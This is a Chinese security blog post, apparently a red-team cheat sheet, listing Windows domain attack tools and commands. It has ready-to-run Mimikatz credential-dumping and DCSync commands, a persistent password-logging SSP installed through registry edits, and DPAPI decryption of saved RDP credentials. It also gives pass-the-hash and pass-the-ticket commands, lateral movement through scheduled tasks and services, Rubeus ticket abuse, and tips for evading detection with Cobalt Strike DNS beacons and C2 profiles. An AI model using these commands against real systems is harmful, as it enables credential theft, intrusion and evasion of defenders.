<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="bypass,">





  <link rel="alternate" href="/atom.xml" title="scareing的学习笔记" type="application/atom+xml">






<meta name="description" content="工具Mimikatz开源密码抓取工具 抓密码，hash传递 https://github.com/gentilkiwi/mimikatz 12345678910111213141516171819202122232425262728293031323334#手动privilege::debugsekurlsa::logonpasswordslsadump::dcsync /domain:pente">
<meta name="keywords" content="bypass">
<meta property="og:type" content="article">
<meta property="og:title" content="HW工具">
<meta property="og:url" content="https://github.com/scareing/scareing.github.io/2020/07/01/hw工具/index.html">
<meta property="og:site_name" content="scareing的学习笔记">
<meta property="og:description" content="工具Mimikatz开源密码抓取工具 抓密码，hash传递 https://github.com/gentilkiwi/mimikatz 12345678910111213141516171819202122232425262728293031323334#手动privilege::debugsekurlsa::logonpasswordslsadump::dcsync /domain:pente">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/5.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/6.png">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t01df7f513a009a2141.png">
<meta property="og:image" content="https://docs.microsoft.com/en-us/media/landing/sysinternals/adexplorer.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/8.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/9.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/10.png">
<meta property="og:image" content="https://miro.medium.com/max/1180/1*tveSjqydh5Z18w8GEf1sXQ.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/11.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/12.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/13.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/14.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/15.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/16.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/17.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/18.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/19.png">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/20.png">
<meta property="og:updated_time" content="2021-07-23T15:10:25.982Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HW工具">
<meta name="twitter:description" content="工具Mimikatz开源密码抓取工具 抓密码，hash传递 https://github.com/gentilkiwi/mimikatz 12345678910111213141516171819202122232425262728293031323334#手动privilege::debugsekurlsa::logonpasswordslsadump::dcsync /domain:pente">
<meta name="twitter:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://github.com/scareing/scareing.github.io/2020/07/01/hw工具/">





  <title>HW工具 | scareing的学习笔记</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">scareing的学习笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">道可道，非常道, 名可名，非常名!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://github.com/scareing/scareing.github.io/2020/07/01/hw工具/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="scareing">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/Bloglogo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="scareing的学习笔记">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">HW工具</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-01T12:12:57+08:00">
                2020-07-01
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Windows/" itemprop="url" rel="index">
                    <span itemprop="name">Windows</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h1><h2 id="Mimikatz"><a href="#Mimikatz" class="headerlink" title="Mimikatz"></a>Mimikatz</h2><p>开源密码抓取工具</p>
<p>抓密码，hash传递</p>
<p><a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">#手动</span><br><span class="line">privilege::debug</span><br><span class="line">sekurlsa::logonpasswords</span><br><span class="line">lsadump::dcsync /domain:pentestlab.local /all /csv  全域</span><br><span class="line">#一句话</span><br><span class="line">mimikatz.exe pass</span><br><span class="line">#通过注册表开启Windows明文密码记录（2012及以上默认抓不到明文密码）</span><br><span class="line">mimikatz.exe reg</span><br><span class="line">#内存注入实现明文记录到文本，需再次登录，重启无效（有蓝屏风险）</span><br><span class="line">privilege::debug</span><br><span class="line">misc::memssp</span><br><span class="line">type C:<span class="symbol">\W</span>indows<span class="symbol">\s</span>ystem32<span class="symbol">\m</span>imilsa.log</span><br><span class="line">#dll+注册表，永久性密码记录到文本，</span><br><span class="line">copy mimilib.dll <span class="variable">%systemroot%</span><span class="symbol">\s</span>ystem32</span><br><span class="line">reg query hklm<span class="symbol">\s</span>ystem<span class="symbol">\c</span>urrentcontrolset<span class="symbol">\c</span>ontrol<span class="symbol">\l</span>sa<span class="symbol">\ </span>/v "Security Packages"</span><br><span class="line">reg add hklm<span class="symbol">\s</span>ystem<span class="symbol">\c</span>urrentcontrolset<span class="symbol">\c</span>ontrol<span class="symbol">\l</span>sa<span class="symbol">\ </span>/v "Security Packages" /d "kerberos<span class="symbol">\0</span>msv1_0<span class="symbol">\0</span>schannel<span class="symbol">\0</span>wdigest<span class="symbol">\0</span>tspkg<span class="symbol">\0</span>pku2u<span class="symbol">\0</span>mimilib" /t REG_MULTI_SZ</span><br><span class="line">type C:<span class="symbol">\W</span>indows<span class="symbol">\s</span>ystem32<span class="symbol">\k</span>iwissp.log</span><br><span class="line"></span><br><span class="line">#获取winodws保存的本地rdp凭证</span><br><span class="line">dir /a <span class="variable">%userprofile%</span><span class="symbol">\A</span>ppData<span class="symbol">\L</span>ocal<span class="symbol">\M</span>icrosoft<span class="symbol">\C</span>redentials<span class="symbol">\*</span></span><br><span class="line">privilege::debug</span><br><span class="line">dpapi::cred /in:C:<span class="symbol">\U</span>sers<span class="symbol">\k</span>ering<span class="symbol">\A</span>ppData<span class="symbol">\L</span>ocal<span class="symbol">\M</span>icrosoft<span class="symbol">\C</span>redentials<span class="symbol">\D</span>FBE70A7E5CC19A398EBF1B96859CE5D</span><br><span class="line">sekurlsa::dpapi</span><br><span class="line">dpapi::cred /in:C:<span class="symbol">\U</span>sers<span class="symbol">\k</span>ering<span class="symbol">\A</span>ppData<span class="symbol">\L</span>ocal<span class="symbol">\M</span>icrosoft<span class="symbol">\C</span>redentials<span class="symbol">\D</span>FBE70A7E5CC19A398EBF1B96859CE5D /masterkey:6ccd15632f9354e9fa30a2656bbf193985aa4568876fc9e4b35d72159b79f3d312c4a5b5327272b0328d833aadba7f4d156a976286588ab4bf58f85dbb73e4fe</span><br><span class="line"></span><br><span class="line">#传递</span><br><span class="line">sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /ntlm:xxxxxxxxxxxx  #hash传递</span><br><span class="line">sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /aes256:xxxxxxxxxxxxxx  #key传递</span><br><span class="line">sekurlsa::pth /user:&lt;user name&gt; /domain:&lt;domain name&gt; /ntlm:&lt;the user's ntlm hash&gt; /run:"mstsc.exe /restrictedadmin"</span><br><span class="line">kerberos::ptt [0;862bdd]-2-0-60a10000-DM2012$@krbtgt-TEST.LOCAL.kirbi</span><br><span class="line">#凭据</span><br><span class="line">kerberos::purge  //清空当前机器所有凭证</span><br><span class="line">Kerberos::list //查看当前机器凭证</span><br><span class="line">kerberos::ptc TGT_admin@cgn.com.ccache //将票据注入到进程中</span><br></pre></td></tr></table></figure>

<p>  <img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/1.png" alt="avatar"></p>
<h3 id="mimikatz-ptt-net-use-schtasks-横向"><a href="#mimikatz-ptt-net-use-schtasks-横向" class="headerlink" title="mimikatz ptt + net use + schtasks 横向"></a>mimikatz ptt + net use + schtasks 横向</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">传递</span><br><span class="line">sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /ntlm:xxxxxxxxxxxx  #hash传递</span><br><span class="line">挂载</span><br><span class="line">net use \\192.168.14.131\C$</span><br><span class="line">测试文件传输</span><br><span class="line">copy 1.txt \\192.168.14.131\C$</span><br><span class="line">创建计划任务<span class="keyword">or</span>服务修改<span class="keyword">or</span>服务创建</span><br><span class="line">schtasks /S \\192.168.14.131\ /create /RU<span class="built_in"> SYSTEM </span>/RL HIGHEST /F /tn <span class="string">"SysDebug"</span> /tr <span class="string">"C:\windows\SysDebug.exe"</span> /sc DAILY /mo 1 /ST 11:05</span><br><span class="line">sc \\test-win7t<span class="built_in"> config </span>a2 binpath= <span class="string">"c:\cqooc.exe"</span> start= auto</span><br><span class="line">sc \\test-win7t create a2 binpath= <span class="string">"c:\calc.exe"</span> start= auto</span><br><span class="line">密码转hash</span><br><span class="line">Rubeus.exe hash /user:evilsystem /password:evil /domain:test.local</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/2.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/3.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/4.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/5.png" alt="avatar"></p>
<h3 id="Hash-rdp"><a href="#Hash-rdp" class="headerlink" title="Hash rdp"></a>Hash rdp</h3><p>如果目标使用“受限管理模式”，即可通过hash远程桌面（默认关闭）。</p>
<p>可以通过注册表开启。</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">利用hash注入凭据到mstsc程序。默认情况会登录失败</span><br><span class="line">sekurlsa:<span class="function">:pth</span> <span class="string">/user</span>:&lt;user name&gt; <span class="string">/domain</span>:&lt;domain name&gt; <span class="string">/ntlm</span>:&lt;the user's ntlm hash&gt; <span class="string">/run</span>:<span class="string">"mstsc.exe /restrictedadmin"</span></span><br><span class="line">以目标凭据启动powershell</span><br><span class="line">mimikatz.exe <span class="string">"sekurlsa::pth /user:&lt;user name&gt; /domain:&lt;domain name&gt; /ntlm:&lt;the user's ntlm hash&gt; /run:powershell.exe"</span></span><br><span class="line">获取目标powershell（需要开启winrm服务（服务器默认开启），且凭据用户拥有目标管理员权限）target值应为目标主机名</span><br><span class="line">Enter-PSSession -Computer &lt;Target&gt;</span><br><span class="line">winrm quickconfig -q</span><br><span class="line">sc start winrm</span><br><span class="line">这里也可能视为手动winrm横向,流量无法通过代理,cs的横向payload见杀软就没了，这样反而更加有效</span><br><span class="line">修改注册表开启受限管理员模式</span><br><span class="line">New-ItemProperty -Path <span class="string">"HKLM:\System\CurrentControlSet\Control\Lsa"</span> -Name <span class="string">"DisableRestrictedAdmin"</span> -Value <span class="string">"0"</span> -PropertyType DWORD -Force</span><br><span class="line"></span><br><span class="line">REG ADD HKLM\System\CurrentControlSet\Control\Lsa <span class="string">/v</span> DisableRestrictedAdmin <span class="string">/t</span> REG_DWORD <span class="string">/d</span> 00000000 <span class="string">/f</span></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/6.png" alt="avatar"></p>
<h2 id="ServerScan"><a href="#ServerScan" class="headerlink" title="ServerScan"></a>ServerScan</h2><p>开源单文件端口扫描器（跨平台）</p>
<p>命令行扫描，取title，支持tcp,icmp协议，默认线程1500（轻量版无法改线程），专业版手动调整到 1-3000（专业版命令行参数更多，轻量版就够了）</p>
<p>有CS插件，可与CS联动，自动将扫描结果添加到CS的目标中。</p>
<p><a href="https://github.com/Adminisme/ServerScan">https://github.com/Adminisme/ServerScan</a></p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">轻量版</span><br><span class="line">ServerScan_air.exe <span class="number">192.168</span><span class="number">.1</span><span class="number">.0</span>/<span class="number">24</span> <span class="number">1</span><span class="number">-1024</span>,<span class="number">8080</span>,<span class="number">8443</span> tcp</span><br><span class="line">专业版</span><br><span class="line">ServerScan_pro.exe -h <span class="number">192.168</span><span class="number">.1</span><span class="number">.0</span>/<span class="number">24</span> -p <span class="number">1</span><span class="number">-1024</span>,<span class="number">8080</span>,<span class="number">8443</span> -t <span class="number">3000</span> -o result.txt</span><br></pre></td></tr></table></figure>

<h2 id="Seatbelt"><a href="#Seatbelt" class="headerlink" title="Seatbelt"></a>Seatbelt</h2><p><a href="https://github.com/GhostPack/Seatbelt">https://github.com/GhostPack/Seatbelt</a></p>
<p>主机信息收集工具</p>
<p>当前正在执行的命令，最近修改访问过的文件，进程，netstat，杀软，环境变量，服务，网络设置，dns缓存，系统信息, 浏览器历史记录，安装的程序，保存的rdp凭证…..好多东西。</p>
<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Seatbelt.exe -<span class="built_in">group</span>=<span class="built_in">all</span></span><br></pre></td></tr></table></figure>

<h2 id="PsExec64"><a href="#PsExec64" class="headerlink" title="PsExec64"></a>PsExec64</h2><p>横向，明文（不能用hash）</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">PsExec64</span><span class="selector-class">.exe</span> \\192<span class="selector-class">.168</span><span class="selector-class">.1</span><span class="selector-class">.14</span> <span class="selector-tag">-u</span> <span class="selector-tag">test</span> <span class="selector-tag">-p</span> <span class="selector-tag">test</span> <span class="selector-tag">-s</span> <span class="selector-tag">cmd</span></span><br></pre></td></tr></table></figure>

<h2 id="Rubeus"><a href="#Rubeus" class="headerlink" title="Rubeus"></a>Rubeus</h2><p>票据操控工具，只能域环境使用</p>
<p><a href="https://github.com/GhostPack/Rubeus">https://github.com/GhostPack/Rubeus</a></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">请求票据</span><br><span class="line">Rubeus<span class="selector-class">.exe</span> asktgt /user:harmj0y /rc4:<span class="number">2</span>b576acbe6bcfda7294d6bd18041b8fe</span><br><span class="line">提取票据</span><br><span class="line">Rubeus<span class="selector-class">.exe</span> tgtdeleg</span><br><span class="line">使用票据修改密码</span><br><span class="line">Rubeus<span class="selector-class">.exe</span> changepw /ticket:test<span class="selector-class">.kirbi</span> /new:password@<span class="number">123</span></span><br><span class="line">密码转hash</span><br><span class="line">Rubeus<span class="selector-class">.exe</span> hash /user:evilsystem /password:evil /domain:test.local</span><br><span class="line">每隔一秒监听一次来自DNS的登陆（需要本地管理员权限）</span><br><span class="line">Rubeus<span class="selector-class">.exe</span> monitor /interval:<span class="number">1</span> /filteruser:DNS$</span><br><span class="line">哈希传递</span><br><span class="line">Rubeus<span class="selector-class">.exe</span> ptt /ticket:base64</span><br></pre></td></tr></table></figure>

<p><img src="https://p0.ssl.qhimg.com/t01df7f513a009a2141.png" alt="img"></p>
<h2 id="AdExplorer"><a href="#AdExplorer" class="headerlink" title="AdExplorer"></a>AdExplorer</h2><p>域成员查询</p>
<p>可以即时查询AD数据库，查看域成员的各种信息。</p>
<p><img src="https://docs.microsoft.com/en-us/media/landing/sysinternals/adexplorer.jpg" alt="AD Explorer屏幕截图"></p>
<h2 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h2><p>域信息收集</p>
<p>通过neo4j数据库可展示域内关系，权限分配，攻击路径</p>
<p><a href="https://github.com/BloodHoundAD/BloodHound">https://github.com/BloodHoundAD/BloodHound</a></p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Bloodhound.exe -c <span class="keyword">all</span> <span class="comment">--nosavecache --zipfilename domain.zip</span></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/7.png" alt="avatar"></p>
<h2 id="ANGRYPUPPY"><a href="#ANGRYPUPPY" class="headerlink" title="ANGRYPUPPY"></a>ANGRYPUPPY</h2><p>自动化工具，CS插件</p>
<p>先得用Bloodhound收集域内信息，然后计算出到目标的路径，导出json文件，导入到ANGRYPUPPY，然后就会自动使用hash传递，一个一个的打过去</p>
<p><a href="https://github.com/vysecurity/ANGRYPUPPY">https://github.com/vysecurity/ANGRYPUPPY</a></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/8.png" alt="avatar"></p>
<h2 id="MoveKit"><a href="#MoveKit" class="headerlink" title="MoveKit"></a>MoveKit</h2><h2 id="NPS"><a href="#NPS" class="headerlink" title="NPS"></a>NPS</h2><p>反向代理工具</p>
<p>流量加密，代理不用可以挂起，支持多协议，支持多个代理客户端</p>
<p><a href="https://github.com/ehang-io/nps">https://github.com/ehang-io/nps</a></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/9.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/10.png" alt="avatar"></p>
<h2 id="CHISEL"><a href="#CHISEL" class="headerlink" title="CHISEL"></a>CHISEL</h2><p><strong>支持CDN的开源反向代理</strong></p>
<p>使用HTTP协议传输，并通过SSH协议加密。</p>
<p><a href="https://github.com/jpillora/chisel">https://github.com/jpillora/chisel</a></p>
<p><img src="https://miro.medium.com/max/1180/1*tveSjqydh5Z18w8GEf1sXQ.png" alt="img"></p>
<h1 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>技巧</h1><h2 id="DNS上线"><a href="#DNS上线" class="headerlink" title="DNS上线"></a>DNS上线</h2><p>可以规避流量检测，netstat看不到</p>
<blockquote>
<p>域名配置</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/11.png" alt="avatar"></p>
<blockquote>
<p>监听配置（必须指定53端口）</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/12.png" alt="avatar"></p>
<blockquote>
<p>验证联通性，最后必须返回解析地址，默认为0.0.0.0</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/13.png" alt="avatar"></p>
<blockquote>
<p>上线标志，刚开始为沉睡状态，需要执行checkin命令强制唤醒</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/14.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/15.png" alt="avatar"></p>
<p><strong>dns网速极慢，正常执行命令还行，如果流量一大，几分钟就过去了。例：密码抓取花费2min。</strong></p>
<h2 id="CS配置文件（流量特征修改）"><a href="#CS配置文件（流量特征修改）" class="headerlink" title="CS配置文件（流量特征修改）"></a>CS配置文件（流量特征修改）</h2><p>CS域名前置也是通过CS配置文件实现的，通过配置文件我们可以修改，https证书（自生成），请求报文，返回报文，默认sleep时间，payload，CS进程管道名，等等，很多。</p>
<p>C2concealer：用于生成随机的CS配置文件</p>
<p><a href="https://github.com/FortyNorthSecurity/C2concealer">https://github.com/FortyNorthSecurity/C2concealer</a></p>
<blockquote>
<p>配置选项</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/16.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/17.png" alt="avatar"></p>
<blockquote>
<p>流量效果,host为我自定义的GitHub，ip为我转16进制后的结果660712688</p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/18.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/19.png" alt="avatar"></p>
<p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2020/07/01/hw%E5%B7%A5%E5%85%B7/20.png" alt="avatar"></p>

      
    </div>
    
    
    
    <div>
          
            
          
    </div>

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    scareing
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://github.com/scareing/scareing.github.io/2020/07/01/hw工具/" title="HW工具">https://github.com/scareing/scareing.github.io/2020/07/01/hw工具/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/bypass/" rel="tag"># bypass</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/26/Waf_Bypass/" rel="next" title="Waf_Bypass">
                <i class="fa fa-chevron-left"></i> Waf_Bypass
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

